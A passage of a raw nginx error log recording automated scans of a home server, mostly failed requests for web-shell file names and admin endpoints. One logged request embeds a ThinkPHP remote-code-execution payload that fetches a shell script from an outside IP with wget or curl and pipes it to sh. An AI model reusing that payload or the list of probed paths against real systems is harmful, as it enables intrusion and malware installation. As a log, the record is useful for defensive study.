localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:11 [error] 209#209: *3067 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:11 [error] 209#209: *3067 open() "/var/www/html/yvxhx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /yvxhx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:11 [error] 209#209: *3067 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:12 [error] 209#209: *3067 open() "/var/www/html/qing2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /qing2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:12 [error] 209#209: *3067 open() "/var/www/html/doo.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /doo.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:12 [error] 209#209: *3067 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /moon.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:12 [error] 209#209: *3067 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /buy.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:13 [error] 209#209: *3067 open() "/var/www/html/9v6.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /9v6.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:13 [error] 209#209: *3067 open() "/var/www/html/dbc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dbc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:13 [error] 209#209: *3067 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /log.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:13 [error] 209#209: *3067 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:14 [error] 209#209: *3067 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:14 [error] 209#209: *3067 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:14 [error] 209#209: *3067 open() "/var/www/html/rh.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /rh.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:14 [error] 209#209: *3067 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:14 [error] 209#209: *3067 open() "/var/www/html/siteheads.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /siteheads.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:15 [error] 209#209: *3067 open() "/var/www/html/wp-links.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-links.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:15 [error] 209#209: *3067 open() "/var/www/html/zer.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /zer.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:15 [error] 209#209: *3067 open() "/var/www/html/sid3.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /sid3.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:15 [error] 209#209: *3067 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:16 [error] 209#209: *3067 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:16 [error] 209#209: *3067 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:16 [error] 209#209: *3067 open() "/var/www/html/ant.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ant.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:16 [error] 209#209: *3067 open() "/var/www/html/O-Simple.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /O-Simple.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:17 [error] 209#209: *3067 open() "/var/www/html/0o0.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /0o0.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:17 [error] 209#209: *3067 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:17 [error] 209#209: *3067 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /content.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:17 [error] 209#209: *3067 open() "/var/www/html/support.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /support.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:18 [error] 209#209: *3067 open() "/var/www/html/styles.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /styles.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:18 [error] 209#209: *3067 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:18 [error] 209#209: *3067 open() "/var/www/html/wp-content/themes/finley/min.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/finley/min.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:18 [error] 209#209: *3067 open() "/var/www/html/class.api.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /class.api.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:18 [error] 209#209: *3067 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:19 [error] 209#209: *3067 open() "/var/www/html/155.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /155.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:19 [error] 209#209: *3067 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:19 [error] 209#209: *3067 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:19 [error] 209#209: *3067 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:20 [error] 209#209: *3067 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:20 [error] 209#209: *3067 open() "/var/www/html/horeg.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /horeg.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:20 [error] 209#209: *3067 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:20 [error] 209#209: *3067 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:21 [error] 209#209: *3067 open() "/var/www/html/sfudq.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /sfudq.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:21 [error] 209#209: *3067 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:21 [error] 209#209: *3067 open() "/var/www/html/wp-22.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-22.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:21 [error] 209#209: *3067 open() "/var/www/html/asx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /asx.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:21 [error] 209#209: *3067 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:22 [error] 209#209: *3067 open() "/var/www/html/dox.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dox.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:22 [error] 209#209: *3067 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:22 [error] 209#209: *3067 open() "/var/www/html/ng.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ng.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:23 [error] 209#209: *3067 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:23 [error] 209#209: *3067 open() "/var/www/html/page.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /page.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:23 [error] 209#209: *3067 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:23 [error] 209#209: *3067 open() "/var/www/html/sf.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /sf.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:24 [error] 209#209: *3067 open() "/var/www/html/qual.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /qual.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:24 [error] 209#209: *3067 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /12.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:24 [error] 209#209: *3067 open() "/var/www/html/s.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /s.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:24 [error] 209#209: *3067 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:25 [error] 209#209: *3067 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /simple.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:25 [error] 209#209: *3067 open() "/var/www/html/11.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /11.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:25 [error] 209#209: *3067 open() "/var/www/html/wp-admin/css/colors/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:26 [error] 209#209: *3067 open() "/var/www/html/wp-includes/Text/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:26 [error] 209#209: *3067 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:26 [error] 209#209: *3067 open() "/var/www/html/past.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /past.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:26 [error] 209#209: *3067 open() "/var/www/html/revision.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /revision.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:27 [error] 209#209: *3067 open() "/var/www/html/baxa1.phP8" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /baxa1.phP8 HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:27 [error] 209#209: *3067 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:27 [error] 209#209: *3067 open() "/var/www/html/massby2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /massby2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:27 [error] 209#209: *3068 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 20.15.162.215, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "91.82.215.191" +2026/01/25 18:19:27 [error] 209#209: *3067 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:28 [error] 209#209: *3067 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:28 [error] 209#209: *3067 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:28 [error] 209#209: *3067 open() "/var/www/html/wp-admin/images/admin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:28 [error] 209#209: *3067 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:28 [error] 209#209: *3067 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:29 [error] 209#209: *3067 open() "/var/www/html/mh.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /mh.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:29 [error] 209#209: *3067 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:29 [error] 209#209: *3067 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:29 [error] 209#209: *3067 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:30 [error] 209#209: *3067 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws46.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:30 [error] 209#209: *3067 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:30 [error] 209#209: *3067 open() "/var/www/html/gecko.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /gecko.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:30 [error] 209#209: *3067 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 18:19:31 [error] 209#209: *3067 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/25 19:08:58 [error] 210#210: *3103 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 19:38:55 [error] 210#210: *3121 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 20:25:18 [error] 208#208: *3152 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 20:31:00 [error] 208#208: *3156 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 21:11:54 [error] 211#211: *3207 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 21:41:50 [error] 211#211: *3465 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 22:07:27 [error] 211#211: *3478 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.169.53.8, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/25 22:34:57 [error] 222#222: *3493 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 22:41:54 [error] 225#225: *3502 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/25 23:21:39 [error] 222#222: *3546 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "91.82.215.191:80", referrer: "http://91.82.215.191:80/home.asp" +2026/01/25 23:27:09 [error] 222#222: *3548 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 00:10:32 [error] 222#222: *3605 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 00:49:37 [error] 223#223: *3615 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 20.163.15.131, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "91.82.215.191" +2026/01/26 00:59:13 [error] 223#223: *3620 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 01:44:44 [error] 223#223: *3629 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 02:30:51 [error] 224#224: *3647 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 02:49:54 [error] 224#224: *3681 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 03:16:16 [error] 225#225: *3707 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 03:25:48 [error] 225#225: *3710 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 04:12:42 [error] 225#225: *3728 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:42 [error] 222#222: *3729 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:42 [error] 222#222: *3730 open() "/var/www/html/t4" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:43 [error] 222#222: *3731 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:43 [error] 223#223: *5219 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:43 [error] 223#223: *5220 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:12:44 [error] 224#224: *5221 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 162.243.60.61, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 04:48:26 [error] 232#232: *5230 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 05:07:10 [error] 229#229: *5234 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 05:07:10 [error] 229#229: *5235 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%29%7Csh HTTP/1.1", host: "91.82.215.191" +2026/01/26 05:07:10 [error] 229#229: *5236 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.215.191" +2026/01/26 05:14:28 [error] 229#229: *5240 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/26 05:34:59 [error] 230#230: *5253 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 05:39:01 [error] 230#230: *5254 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:01 [error] 230#230: *5254 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //autoload_classmap.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:01 [error] 230#230: *5254 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:01 [error] 230#230: *5254 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 